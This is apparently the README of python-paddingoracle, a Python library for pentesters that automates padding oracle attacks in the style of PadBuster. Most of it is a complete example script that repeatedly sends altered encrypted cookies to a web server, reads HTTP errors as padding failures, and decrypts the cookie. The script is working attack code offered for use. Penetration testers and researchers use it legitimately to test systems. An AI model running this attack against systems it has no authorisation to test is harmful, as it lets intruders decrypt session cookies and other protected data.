python-paddingoracle is an API that provides pentesters a customizable alternative to PadBuster and other padding oracle exploit tools that can't easily (without a heavy rewrite) be used in unique, per-app scenarios. Think non-HTTP applications, raw sockets, client applications, unique encodings, etc.
To use the paddingoracle API, simply implement the oracle() method from the PaddingOracle API and raise a BadPaddingException when the decrypter reveals a padding oracle. To decrypt data, pass raw encrypted bytes to decrypt() with a block size (typically 8 or 16) and optional iv parameter.
See below for an example (from the example):
from paddingoracle import BadPaddingException, PaddingOracle from base64 import b64encode, b64decode from urllib import quote, unquote import requests import socket import time class PadBuster(PaddingOracle): def __init__(self, **kwargs): super(PadBuster, self).__init__(**kwargs) self.session = requests.Session() self.wait = kwargs.get('wait', 2.0) def oracle(self, data, **kwargs): somecookie = quote(b64encode(data)) self.session.cookies['somecookie'] = somecookie while 1: try: response = self.session.get('http://www.example.com/', stream=False, timeout=5, verify=False) break except (socket.error, requests.exceptions.RequestException): logging.exception('Retrying request in %.2f seconds...', self.wait) time.sleep(self.wait) continue self.history.append(response) if response.ok: logging.debug('No padding exception raised on %r', somecookie) return # An HTTP 500 error was returned, likely due to incorrect padding raise BadPaddingException if __name__ == '__main__': import logging import sys if not sys.argv[1:]: print 'Usage: %s <somecookie value>' % (sys.argv[0], ) sys.exit(1) logging.basicConfig(level=logging.DEBUG) encrypted_cookie = b64decode(unquote(sys.argv[1])) padbuster = PadBuster() cookie = padbuster.decrypt(encrypted_cookie, block_size=8, iv=bytearray(8)) print('Decrypted somecookie: %s => %r' % (sys.argv[1], cookie))
python-paddingoracle is a Python implementation heavily based on PadBuster, an automated script for performing Padding Oracle attacks, developed by Brian Holyfield of Gotham Digital Science.